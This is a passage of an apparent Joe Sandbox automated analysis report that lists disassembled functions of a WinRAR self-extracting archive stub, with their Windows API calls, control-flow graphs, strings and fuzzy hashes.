                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00DDBA01
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00DDBA17
                                                                              • UpdateWindow.USER32(00000000), ref: 00DDBA20
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
                                                                              • String ID: RarHtmlClassName
                                                                              • API String ID: 3841971108-1658105358
                                                                              • Opcode ID: 1db6569286e63eff4c186dea7b09855b98555dbcd157f1fb05771cc5de373294
                                                                              • Instruction ID: 2de879e187113b3d9c1b8372eebdc40be8a5fcbab8b14d8ab50816a11616a120
                                                                              • Opcode Fuzzy Hash: 1db6569286e63eff4c186dea7b09855b98555dbcd157f1fb05771cc5de373294
                                                                              • Instruction Fuzzy Hash: 6641BEB2102204EFCB109F65DC49AEF7BA8FF58768F06551AF945A2291C774D848CBB1
                                                                              Function 00DDD883 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00DDD2BD: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DDD2CE
                                                                                • Part of subcall function 00DDD2BD: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDD2DF
                                                                                • Part of subcall function 00DDD2BD: IsDialogMessageW.USER32(000204C2,?), ref: 00DDD2F3
                                                                                • Part of subcall function 00DDD2BD: TranslateMessage.USER32(?), ref: 00DDD301
                                                                                • Part of subcall function 00DDD2BD: DispatchMessageW.USER32(?), ref: 00DDD30B
                                                                              • GetDlgItem.USER32(00000068,00000000), ref: 00DDD8A6
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00DDD8C4
                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DDD8D4
                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E012DC), ref: 00DDD8E3
                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DDD8FD
                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DDD918
                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DDD959
                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00000000), ref: 00DDD96B
                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DDD97E
                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DDD9A5
                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E01618), ref: 00DDD9B4
                                                                                • Part of subcall function 00DDBA3B: DestroyWindow.USER32(?,00000000,?,00DDD8C1), ref: 00DDBA4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$Window$DestroyDialogDispatchItemPeekShowTranslate
                                                                              • String ID: \
                                                                              • API String ID: 1209198919-2967466578
                                                                              • Opcode ID: a70ae73a18a825c38f4f4b37a8da0281ead46568ad1799a9b632964ca293f549
                                                                              • Instruction ID: feed822b121dfe57c7664bc3c6d3d81c00cb13794d5e57ee8e5dacea218c2d4b
                                                                              • Opcode Fuzzy Hash: a70ae73a18a825c38f4f4b37a8da0281ead46568ad1799a9b632964ca293f549
                                                                              • Instruction Fuzzy Hash: 1431F2B1386304BFE3109F21DC0AFAB7B9CEB56714F080519F551BA3D2C7A5994887AA
                                                                              Function 00DDFB52 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 460COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 749 ddfb52-ddfb87 call df8246 call dc21e6 754 de0c44-de0c58 call de0caa 749->754 757 de0c5e-de0c6e call dc1e5c call df81f5 754->757 758 ddfb8c-ddfbb3 call dc21e6 call dd1b0d 754->758 767 ddfbb5-ddfbef call dc855e call dc3060 call dc1e5c call dcb454 758->767 768 ddfbf4-ddfc16 call dc3ae6 call dc21e6 758->768 767->768 777 ddfc2a-ddfc41 call dd6099 768->777 783 ddfc18-ddfc25 call de151b 777->783 784 ddfc43 777->784 783->777 786 ddfc45-ddfc6e call dc1d16 call dcb856 call dc1e5c 784->786 793 ddfc7b-ddfc7e 786->793 794 ddfc70-ddfc74 786->794 795 ddfc84 793->795 796 de0c21-de0c3f call dc1e5c call de1536 call dc1e5c 793->796 794->786 797 ddfc76 794->797 799 ddffdc-ddffe0 795->799 800 ddfff9-ddfffd 795->800 801 ddfc8b-ddfc8f 795->801 802 ddff30-ddff34 795->802 796->754 797->796 799->796 806 ddffe6-ddfff4 call dc22aa 799->806 800->796 807 de0003-de000f call dc5cf0 800->807 801->796 805 ddfc95-ddfcf6 call dc21e6 * 2 call dd1a88 call dd0d19 call dcf873 call dcf8a1 call dca722 801->805 802->796 804 ddff3a-ddff48 call dc5cf0 802->804 819 ddff4a-ddff4f call dc8596 804->819 820 ddff54-ddff5b 804->820 876 ddfedd-ddfef2 call dcf8b5 805->876 806->796 807->796 822 de0015-de0034 call dc8cb5 call dc1891 807->822 819->820 825 ddff5d-ddff73 call dc8cb5 820->825 826 ddff75-ddff8e call de1163 820->826 839 de007d-de008c call dc2374 822->839 840 de0036-de0042 call dc2374 822->840 838 ddff91-ddffa2 call dc1274 825->838 826->838 848 ddffb8-ddffc2 838->848 849 ddffa4-ddffb3 call dc1e5c 838->849 852 de008e-de009e call dc2374 839->852 853 de00cb-de00d1 839->853 840->839 856 de0044-de0052 call dd1b29 840->856 848->796 855 ddffc8-ddffd7 848->855 849->848 862 de00d7-de00e1 call dd0cad 852->862 872 de00a0-de00af call dc2374 852->872 861 de01a7-de01f7 call dc335d call de13f1 GetDlgItem call dc22aa call dc126f SendMessageW call dcda0a 853->861 853->862 859 ddff26-ddff2b call dc1e5c 855->859 856->839 873 de0054-de0078 call dc855e call dc3060 call dc1e5c 856->873 859->796 913 de01fc-de01fe 861->913 862->861 880 de00e7-de0146 call dc21e6 call dc1d16 * 3 call ddd728 862->880 888 de00b9-de00c6 call dcb435 872->888 889 de00b1-de00b4 872->889 873->839 893 ddfef8 876->893 894 ddfcfb-ddfd0f call dcf34e 876->894 931 de014b-de01a2 call dc1e5c * 3 call dd0cf6 call dd1db0 call dc3060 call dc1e5c * 2 880->931 888->861 889->859 901 ddff02-ddff18 call dca746 call dcf887 893->901 910 ddfdca-ddfdd8 call dcf2f2 894->910 911 ddfd15-ddfd41 call dc21e6 call dd13db call dd0cf6 call dc1891 894->911 923 ddff23 901->923 924 ddff1e call dc1e5c 901->924 910->876 928 ddfdde-ddfdeb call dcf58e 910->928 947 ddfd4f-ddfd59 call dd0c69 911->947 948 ddfd43-ddfd4d call dc1891 911->948 913->889 918 de0204-de021a call dc126f SendMessageW 913->918 918->796 918->889 923->859 924->923 928->876 936 ddfdf1-ddfdfd call dc21e6 928->936 931->861 945 ddfdff-ddfe8e call dc62c5 call dd1d51 call dcda96 call dc138d call dc3060 call dc1e5c * 4 call dcf2f2 936->945 992 ddfe9d-ddfebc call dc126f * 2 MoveFileW 945->992 993 ddfe90-ddfe97 945->993 958 ddfd5f-ddfdc5 call dc8584 call dc126f call dc1e5c 947->958 959 ddfefa-ddfefd call dc1e5c 947->959 948->947 948->958 958->910 959->901 998 ddfebe-ddfecb call dc126f MoveFileExW 992->998 999 ddfed1-ddfed8 call dc1e5c 992->999 993->945 993->992 998->999 999->876
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3_
                                                                              • String ID: .tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 2427045233-2731831684
                                                                              • Opcode ID: 99d280a50d3b3976e0953828b2689934be02414d8f42352e0c6d67f7e1e3d884
                                                                              • Instruction ID: 38c948bacfaf7e9a98165cca5be4cdfb58715f53e696d2733c3a49aeab2a81ce
                                                                              • Opcode Fuzzy Hash: 99d280a50d3b3976e0953828b2689934be02414d8f42352e0c6d67f7e1e3d884
                                                                              • Instruction Fuzzy Hash: 2A124B358002699ADB25EBA0CC91FEDBB75EF15310F5441AEE446B3192EFB01B89CB71
                                                                              Function 00DDBDCA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 125memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1003 ddbdca-ddbdd3 1004 ddbdd9-ddbe07 call ddc0e9 call de7c3d call dec028 1003->1004 1005 ddbf13-ddbf16 1003->1005 1012 ddbe0d-ddbe3a call de7f85 call dec603 * 2 1004->1012 1013 ddbf11-ddbf12 1004->1013 1020 ddbe3c-ddbe42 1012->1020 1021 ddbe44-ddbe5b call dd84d4 1012->1021 1013->1005 1020->1020 1020->1021 1024 ddbe5d 1021->1024 1025 ddbe60-ddbe6e call dec603 1021->1025 1024->1025 1028 ddbe7d-ddbe82 1025->1028 1029 ddbe70-ddbe7c call dec603 1025->1029 1031 ddbe8c-ddbea6 call de7c3d GlobalAlloc 1028->1031 1032 ddbe84-ddbe8a call ddc12a 1028->1032 1029->1028 1038 ddbea8-ddbec5 WideCharToMultiByte 1031->1038 1039 ddbed5-ddbeed call deba9e 1031->1039 1032->1031 1040 ddbec7-ddbed0 1038->1040 1041 ddbed2 1038->1041 1039->1013 1045 ddbeef-ddbef8 call ddbca4 1039->1045 1040->1039 1041->1039 1047 ddbefd-ddbf0f 1045->1047 1047->1013
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00DDBE9C
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00DDBEBD
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DDBEE4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                              • String ID: Fju0:.uPou$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                              • API String ID: 4094277203-2565152914
                                                                              • Opcode ID: bdd302f963d1af60780d4da626a2508e477d5ec48dd2f8f4c2aafa262763c5ce
                                                                              • Instruction ID: 8452c16b960aec7c720977b910be7a694faaf8b05970c5c238a970ed04589704
                                                                              • Opcode Fuzzy Hash: bdd302f963d1af60780d4da626a2508e477d5ec48dd2f8f4c2aafa262763c5ce
                                                                              • Instruction Fuzzy Hash: E3311532208352AAD725BB31DC46FAB779CDF82724F14541FF510A73D2EB60980582B6
                                                                              Function 00DF1069 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1049 df1069-df1075 1050 df1107-df110a 1049->1050 1051 df107a-df108b 1050->1051 1052 df1110 1050->1052 1054 df108d-df1090 1051->1054 1055 df1098-df10b1 LoadLibraryExW 1051->1055 1053 df1112-df1116 1052->1053 1056 df1096 1054->1056 1057 df1130-df1132 1054->1057 1058 df1117-df1127 1055->1058 1059 df10b3-df10bc GetLastError 1055->1059 1061 df1104 1056->1061 1057->1053 1058->1057 1060 df1129-df112a FreeLibrary 1058->1060 1062 df10be-df10d0 call deba64 1059->1062 1063 df10f5-df1102 1059->1063 1060->1057 1061->1050 1062->1063 1066 df10d2-df10e4 call deba64 1062->1066 1063->1061 1066->1063 1069 df10e6-df10f3 LoadLibraryExW 1066->1069 1069->1058 1069->1063
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,00DF1178,?,?,00000000,00DE24EE,?,?,00DF12F1,00000022,FlsSetValue,00DFDA18,00DFDA20,00DE24EE), ref: 00DF112A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-$ext-ms-
                                                                              • API String ID: 3664257935-537541572
                                                                              • Opcode ID: 799939518ff7907bce18ad3f11598e6111118970363644f6cefff038ba3fdde8
                                                                              • Instruction ID: 019971f1b2c50f263367da95fef96921706d8f48e5ef9b6de400008fdd2e0404
                                                                              • Opcode Fuzzy Hash: 799939518ff7907bce18ad3f11598e6111118970363644f6cefff038ba3fdde8
                                                                              • Instruction Fuzzy Hash: 9E210539A00359EBCB219B21EC45A7A7768DB017B4F2A8121EB55A7391EF30ED44C6F0
                                                                              Function 00DDD16C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30comCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1301 ddd16c-ddd1ca call dd6d27 call ddd229 GdiplusStartup SHGetMalloc
                                                                              APIs
                                                                                • Part of subcall function 00DD6D27: __EH_prolog3_GS.LIBCMT ref: 00DD6D2E
                                                                                • Part of subcall function 00DD6D27: GetSystemDirectoryW.KERNEL32(00000000), ref: 00DD6D59
                                                                                • Part of subcall function 00DD6D27: LoadLibraryW.KERNEL32(00000000,00DD4B85,?,00000104,?,0000005C,00DD4B85,00000000,00DD4D83,00000000,?,?,?,?,00DD4C55,?), ref: 00DD6DB9
                                                                              • OleInitialize.OLE32(00000000), ref: 00DDD183
                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DDD1B5
                                                                              • SHGetMalloc.SHELL32(00E097DC), ref: 00DDD1C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryGdiplusH_prolog3_InitializeLibraryLoadMallocStartupSystem
                                                                              • String ID: 0:.uPou$riched20.dll$3Ro
                                                                              • API String ID: 3036933512-741537531
                                                                              • Opcode ID: f1f67f03a702f93cf8a29eb73aedf36030b19857dfa0dcee41b4d519f0e0a219
                                                                              • Instruction ID: ceb7f6a2eca739527aa98f72b9a59d3a13122838b1174034e07a99df1f54b04a
                                                                              • Opcode Fuzzy Hash: f1f67f03a702f93cf8a29eb73aedf36030b19857dfa0dcee41b4d519f0e0a219
                                                                              • Instruction Fuzzy Hash: 01F0F4B5A44209AFCB00AFA5EC49B9E7BB8EB08305F044065F545F22D1DA7455488BA1
                                                                              Function 00DCE450 Relevance: 9.1, APIs: 6, Instructions: 119filetimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1308 dce450-dce475 call df8246 1311 dce477-dce47a 1308->1311 1312 dce480 1308->1312 1311->1312 1313 dce47c-dce47e 1311->1313 1314 dce482-dce492 1312->1314 1313->1314 1315 dce49a-dce4a4 1314->1315 1316 dce494 1314->1316 1317 dce4a9-dce4bc call dca722 1315->1317 1318 dce4a6 1315->1318 1316->1315 1321 dce4be 1317->1321 1322 dce4c4-dce4ea call dc126f CreateFileW 1317->1322 1318->1317 1321->1322 1325 dce4ec-dce514 GetLastError call dc21e6 call dd1520 1322->1325 1326 dce561 1322->1326 1340 dce516-dce541 call dc126f CreateFileW GetLastError 1325->1340 1341 dce547 1325->1341 1327 dce567-dce56a 1326->1327 1329 dce56c-dce56f 1327->1329 1330 dce578-dce57c 1327->1330 1329->1330 1332 dce571 1329->1332 1333 dce57e-dce581 1330->1333 1334 dce5a9-dce5ba 1330->1334 1332->1330 1333->1334 1336 dce583-dce5a3 SetFileTime 1333->1336 1338 dce5bc-dce5cd call dc335d 1334->1338 1339 dce5d1-dce5e3 call dca746 call df81f5 1334->1339 1336->1334 1338->1339 1340->1341 1351 dce543-dce545 1340->1351 1346 dce54d-dce55f call dc1e5c 1341->1346 1346->1327 1351->1346
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCE45A
                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,0000008C,00DCA6BA,?,00000005,?,00000011,?,?,00000000), ref: 00DCE4DB
                                                                              • GetLastError.KERNEL32(?,00000005,?,00000011,?,?,00000000,?,00000000,000001A0,00DCB025,00000000,STM), ref: 00DCE4EC
                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,00000005,?,00000011,?,?,00000000,?,00000000), ref: 00DCE52C
                                                                              • GetLastError.KERNEL32(?,00000005,?,00000011,?,?,00000000,?,00000000,000001A0,00DCB025,00000000,STM), ref: 00DCE538
                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00000005,?,00000011,?,?,00000000,?,00000000,000001A0,00DCB025,00000000), ref: 00DCE59D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateErrorLast$H_prolog3_Time
                                                                              • String ID:
                                                                              • API String ID: 1355031880-0
                                                                              • Opcode ID: 2f149c5311fb070cd48af2e5b70140686118bcb74434aa708c1be018cf61e68f
                                                                              • Instruction ID: a5c03ec0e849264c737d8e6169b8f5180a990ed628d2786397081d2e346ba7cb
                                                                              • Opcode Fuzzy Hash: 2f149c5311fb070cd48af2e5b70140686118bcb74434aa708c1be018cf61e68f
                                                                              • Instruction Fuzzy Hash: 7B4191B081071A9FEB24DB70CC45FA9B774BB05328F184288E959A72C2DB749E85CF74
                                                                              Function 00DE1349 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DE1350
                                                                              • RegCreateKeyExW.KERNEL32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,00000024,00DDEF96), ref: 00DE13A6
                                                                              • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 00DE13D4
                                                                              • RegCloseKey.KERNEL32(?), ref: 00DE13DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateH_prolog3_Value
                                                                              • String ID: Software\WinRAR SFX
                                                                              • API String ID: 2907678286-754673328
                                                                              • Opcode ID: 253b53e7b7195ba8107b24b7ed248d64f1e7b5037849dd0133bebf8e8b4d5c72
                                                                              • Instruction ID: 836ea696cc18b2d36969538c96d5a7e657cfd94b8fa6735cb9c1864a0c82c562
                                                                              • Opcode Fuzzy Hash: 253b53e7b7195ba8107b24b7ed248d64f1e7b5037849dd0133bebf8e8b4d5c72
                                                                              • Instruction Fuzzy Hash: AB01C479A00344AADF21BBA2DC8AFFE7779FB89700F44401CF602B31D2DA600949C630
                                                                              Function 00DDEA58 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DDEA5F
                                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,00000000,00000024,00DDE80B), ref: 00DDEA71
                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,00000000,?,?,00000000,?), ref: 00DDEAC1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentVariable$H_prolog3_
                                                                              • String ID: sfxcmd$sfxpar
                                                                              • API String ID: 3605364767-3493335439
                                                                              • Opcode ID: 7771fc100dabc543b39a214ffdf93bff9a4124caee4490e2a55a4f3b1bc5ddf2
                                                                              • Instruction ID: 2428b57941af39d9074e291cdb36867bda8332959eb709412f7f122a6bdc84b9
                                                                              • Opcode Fuzzy Hash: 7771fc100dabc543b39a214ffdf93bff9a4124caee4490e2a55a4f3b1bc5ddf2
                                                                              • Instruction Fuzzy Hash: 39F0A93060075A9ACF08F7B0DD56EBC7379EF44B01F04800EF101AB292CF640A058672
                                                                              Function 00DEF6A3 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1401 def6a3-def6bc 1402 def6be-def6ce call df49a7 1401->1402 1403 def6d2-def6d7 1401->1403 1402->1403 1409 def6d0 1402->1409 1404 def6d9-def6e1 1403->1404 1405 def6e4-def70a call df0db1 1403->1405 1404->1405 1411 def880-def891 call de2815 1405->1411 1412 def710-def71b 1405->1412 1409->1403 1413 def873 1412->1413 1414 def721-def726 1412->1414 1419 def875 1413->1419 1417 def73f-def74a call dee234 1414->1417 1418 def728-def731 call de32e0 1414->1418 1417->1419 1428 def750 1417->1428 1418->1419 1426 def737-def73d 1418->1426 1421 def877-def87e call def8db 1419->1421 1421->1411 1429 def756-def75b 1426->1429 1428->1429 1429->1419 1430 def761-def776 call df0db1 1429->1430 1430->1419 1433 def77c-def78e call df1362 1430->1433 1435 def793-def797 1433->1435 1435->1419 1436 def79d-def7a5 1435->1436 1437 def7df-def7eb 1436->1437 1438 def7a7-def7ac 1436->1438 1440 def7ed-def7ef 1437->1440 1441 def868 1437->1441 1438->1421 1439 def7b2-def7b4 1438->1439 1439->1419 1445 def7ba-def7d4 call df1362 1439->1445 1442 def804-def80f call dee234 1440->1442 1443 def7f1-def7fa call de32e0 1440->1443 1444 def86a-def871 call def8db 1441->1444 1442->1444 1455 def811 1442->1455 1443->1444 1454 def7fc-def802 1443->1454 1444->1419 1445->1421 1456 def7da 1445->1456 1457 def817-def81c 1454->1457 1455->1457 1456->1419 1457->1444 1458 def81e-def836 call df1362 1457->1458 1458->1444 1461 def838-def83f 1458->1461 1462 def860-def866 1461->1462 1463 def841-def842 1461->1463 1464 def843-def855 call df0e6b 1462->1464 1463->1464 1464->1444 1467 def857-def85e call def8db 1464->1467 1467->1421
                                                                              APIs
                                                                              • __alloca_probe_16.LIBCMT ref: 00DEF728
                                                                              • __alloca_probe_16.LIBCMT ref: 00DEF7F1
                                                                              • __freea.LIBCMT ref: 00DEF858
                                                                                • Part of subcall function 00DEE234: RtlAllocateHeap.NTDLL(00000000,00DE24EE,?,?,00DE3E9F,?,?,?,?,?,00DE23FB,00DE24EE,?,?,?,?), ref: 00DEE266
                                                                              • __freea.LIBCMT ref: 00DEF86B
                                                                              • __freea.LIBCMT ref: 00DEF878
                                                                              Memory Dump Source
